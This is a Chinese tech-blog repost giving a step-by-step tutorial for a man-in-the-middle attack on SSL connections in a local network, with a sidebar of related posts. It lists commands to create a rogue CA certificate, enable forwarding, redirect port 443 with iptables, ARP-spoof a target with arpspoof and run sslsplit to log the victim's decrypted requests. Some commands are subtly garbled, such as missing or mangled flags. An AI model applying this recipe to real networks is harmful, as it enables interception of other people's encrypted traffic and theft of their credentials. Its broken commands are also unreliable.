利用ARP欺骗+sslsplit实现ssl连接嗅探

最新推荐文章于 2022-09-07 17:13:05 发布
最新推荐文章于 2022-09-07 17:13:05 发布
阅读量2.4k 收藏 7
点赞数
分类专栏: 网络攻击 文章标签: sslsplit arp欺骗 ssl劫持

原创:http://www.freebuf.com/sectool/48016.html


工具下载

sslsplit在kali系统中是自带的,源码下载地址如下: https://github.com/droe/sslsplit

生成中间ssl代理证书

生成一个私钥: 
openssl genrsa -out ca.key 2048
然后使用私钥生成公钥证书: 
openssl req -new -x509 -days 1096 -key ca.key -out ca.crt

开启IPTABLE进行端口重定向

打开ip_forward: 
echo 1 > /proc/sys/net/ipv4/ip_forward
设置端口重定向(将发往目标机发往443端口的转发到8443端口): 
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
查看IPTABLE状态命令: 
iptables -t nat -L

开启ARP欺骗

arpspoof -i eth0 -192.168.217.129 192.168.217.1
目标机:192.168.217.129
网关:192.168.217.1
攻击192.168.217.129,欺骗目标机,本机的MAC地址就是网关192.168.217.1的MAC地址,从而将目标机的数据流都导向本机;

开启sslsplit嗅探

sslsplit主要的参数:

-k 指定私钥key文件,进行欺骗

-c 指定Root CA证书文件

-D Debug模式,用于输出SSLSplit状态,建议使用时加上

-j 指定log目录地址

-S 指定-j参数目录下需要记录截断GET、POST请求的子目录地址

-l 指定存储的连接信息文件

ssl IP 端口 指定ssl需要监听的端口

tcp IP 端口 指定tcp需要监听的端口

启动sslsplit: 
sslsplit --l connect.log -/opt/sslsplit/test1 -S logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
若交互使用的是GET/PORT请求,那么每一个请求交互都会被保存在logdir目录下;


wolf7s
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用SSLsplit工具实现TLS/SSL中间人攻击 ARP欺骗
永远在奔跑的学习者
11-15 4691
SSL、TLS中间人攻击 利用方法: ARP地址欺骗 修改DHCP服务器 (存在就近原则) 手动修改网关 修改DNS设置 修改HOSTS文件【高于DNS】 ICMP、STP、OSPF 中间人攻击前提 【以下某一条符合则可】 客户端已经信任伪造证书颁发机构(安装其根证书) 攻击者控制了合法证书颁发机构(控制CA服务器,为自己颁发证书) 客户端程序禁止了显示证书错误告警信息 (程序员个人能力有限) ...
利用SSLsplit+arpspoof 实现ARP欺骗
stantic的博客
08-23 584
SSLsplit是纯粹的透明代理,不能充当浏览器中配置的HTTP或SOCKS代理。SSLsplit支持SSL 3.0,TLS 1.0,TLS 1.1和TLS 1.2,以及可选的SSL 2.0。-i(网卡,可以用ip a查看,有ip那个才是),-t(欺骗目标),-r(目标网关)之后在目标机点击继续访问,就劫持成功了,可以在connect.log查看访问信息,在test/logdir可查看传输数据。可以看见,成功进行arp欺骗,并且用sslsplit劫持访问信息和传输数据。拦截目标机流量,先看看目标机网关。
sslsplitSSL攻击工具)
weixin_30292745的博客
11-01 256
d 转载于:https://www.cnblogs.com/yinlili/p/9889662.html
解析中间人攻击之四——SSL欺骗
WHACKW的专栏
10-26 1054
导言 前面的文章中,我们已经探讨了ARP缓存中毒、DNS欺骗以及会话劫持这四种中间人攻击形式。在本文中,我们将研究SSL欺骗,这也是最厉害的中间人攻击方式,因为SSL欺骗可以通过利用人们信赖的服务来发动攻击。首先我们先讨论SSL连接的理论及其安全性问题,然后看看SSL连接如何被利用来发动攻击,最后与大家分享关于SSL欺骗的检测以及防御技巧。 SSL和HTTPS 安全套接字层(SS
parrotOS下利用arpspoof实现arp欺骗及路由转发问题
为你而战的博客
11-25 1198
arpspoof实现arp欺骗及路由转发问题 地址解析协议(ARP): Address Resolution Protocol,由于是IP协议使用了ARP协议,因此通常就把ARP协议划归网络层。作用:将IP解析为MAC地址。 ARP解析原理: 源主机发送ARP广播请求(FF-FF-FF-FF-FF-FF) ARP报文内容:我是10.1.1.1 我的mac:@@-@@-@@-@@-@@-@@ 谁是10.1.1.3 你的mac:? 目标主机接收ARP广播,并回复单播应答。 源主机接收单播应答,并存放
使用sslsplit实现https,imaps,pop3s, smtps等透明代理
maoji的专栏
11-09 2117
参考链接 http://blog.csdn.net/jiayanhui2877/article/details/31379439
研讨三_python_arp欺骗python实现_
10-01
Python ARP欺骗是一种网络攻击技术,它利用了ARP(Address Resolution Protocol)协议的缺陷来篡改网络数据包的流向。ARP是局域网中用于将IP地址映射为MAC地址的协议,而Python的scapy库则提供了实现这种欺骗功能的...
基于C语言+Python实现的网络嗅探器设计.zip
10-23
资源包含文件:课程论文报告word+项目源码+项目截图 流量数据包的抓取与分析,对各层协议的具体分析,能够捕获使用HTTP、FTP、TELNET协议传输的用户名和密码。详细介绍参考:...
基于winpcap的mfc arp欺骗
11-04
ARP欺骗是一种网络攻击技术,通过篡改网络中的ARP(Address Resolution Protocol)响应来实现对数据流的中间人操控。在本项目中,我们探讨的是一个改进的ARP欺骗程序,它修复了之前存在的堆栈溢出问题,并且利用...
arp双向欺骗以及http报文的嗅探(C语言).zip
最新发布
10-19
《ARP双向欺骗与HTTP报文嗅探:C语言实现详解》 在计算机网络中,ARP(Address Resolution Protocol,地址解析协议)是将IP地址转换为MAC地址的关键协议,而HTTP(HyperText Transfer Protocol,超文本传输协议)则...
SSL破解工具SSLsplit.zip
07-16
SSLsplit 是一个针对SSL/TLS加密的网络连接进行攻击,为网络取证和渗透测试的工具。它会终止SSL / TLS和启动一个新的连接到原来的目的地,记录所有传输的数据。它支持普通的TCP和SSL,HTTP和HTTPS,和IPv4和IPv6。为SSL和HTTPS,它生成并签署伪造X509v3证书上飞使用的原始凭证的主题DN和subjectAltName扩展。它支持服务器名称显示,RSA,DSA和ECDSA密钥,DHE 和ECDHE密码套件。如果私钥是可用的,它也可以使用现有的证书。 SSLsplit is a tool that performs man-in-the-middle attacks against SSL/TLS encrypted network connections for network forensics and penetration testing. It terminates SSL/TLS and initiates a new connection to the original destination, logging all data transmitted. It supports plain TCP and SSL, HTTP and HTTPS, and IPv4 and IPv6. For SSL and HTTPS, it generates and signs forged X509v3 certificates on-the-fly using the original certificate's subject DN and subjectAltName extension. It supports Server Name Indication, RSA, DSA, and ECDSA keys, and DHE and ECDHE cipher suites. It can also use existing certificates if the private key is available.
ARP欺骗实现
10-23
主要是实现基本的ARP欺骗,如断网攻击和ip冲突,很简单的代码,主要是为了学习交流
arp中间人攻击无ssl解密报文
04-06
使用ettercap抓到的未解密的ssl报文,详情见博客https://blog.csdn.net/redwand/article/details/105339933
利用arp欺骗获取http账号
xiaotu0821的博客
04-05 994
首先,进行arp欺骗1.arpspoof  -i 网卡 -t 目标ip 网关   然后使用ettercap进行DNS欺骗ettercap ->欺骗 DNS欺骗 流量嗅探2. ettercap -Tq -i eth0-Tq --启动文本模式 q安静模式-i 网卡...
使用sslsplit嗅探tls/ssl连接
weixin_30409849的博客
04-24 967
首先发一个从youtube弄到的sslsplit的使用教程 http://v.qq.com/page/x/k/s/x019634j4ks.html 我最近演示了如何使用mitmproxty执行中间人攻击HTTP(S)连接。当mitmproxy工作支持基于HTTP的通信,它不了解其他基于基于TLS/SSL的流量,比如FTPS,通过SSL的SMTP,通过SSL的IMAP或者其他一些覆盖TLS/SS...
最新kali之sslsplit
vanony的博客
01-25 1004
描述:   透明的SSL / TLS拦截。   SSLsplit是用于对SSL / TLS加密的网络连接进行中间人攻击的工具。 旨在用于网络取证,应用程序安全性分析和渗透测试。   SSLsplit旨在透明地终止使用网络地址转换引擎重定向到该连接连接。 然后,SSLsplit终止SSL / TLS并启动到原始目标地址的新SSL / TLS连接,同时记录传输的所有数据。 除了基于NAT的操作外,SSLsplit还支持静态目标并将SNI指示的服务器名称用作上游目标.SSLsplit纯粹是透明代理,不能充当在浏
利用SSLsplit+arpspoof 实现ARP欺骗劫持流量
m0_63253040的博客
08-17 755
即在中间监听获取网络数据以便获取的有价值的信息实现攻击破坏的目的,即client-mid man-server,此处介绍的sslsplit可以作为mid man监听ssl信息及HTTP信息。http不做介绍仅仅实现代理功能,ssl实现代理的同时要与服务器建立连接,同时伪造证书与客户端建立连接,即双连接,依据获取的client信息再与服务器通信,从而实现明文数据监听。开启路由转发,我们才能把劫持到的目标机的流量请求发送给网关,使目标机能上网,不开启的话目标机无法上网,可以达到断网的目的。...
利用arpspoof + SSLsplit尝试进行arp欺骗
m0_64444909的博客
09-07 1953
kali
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值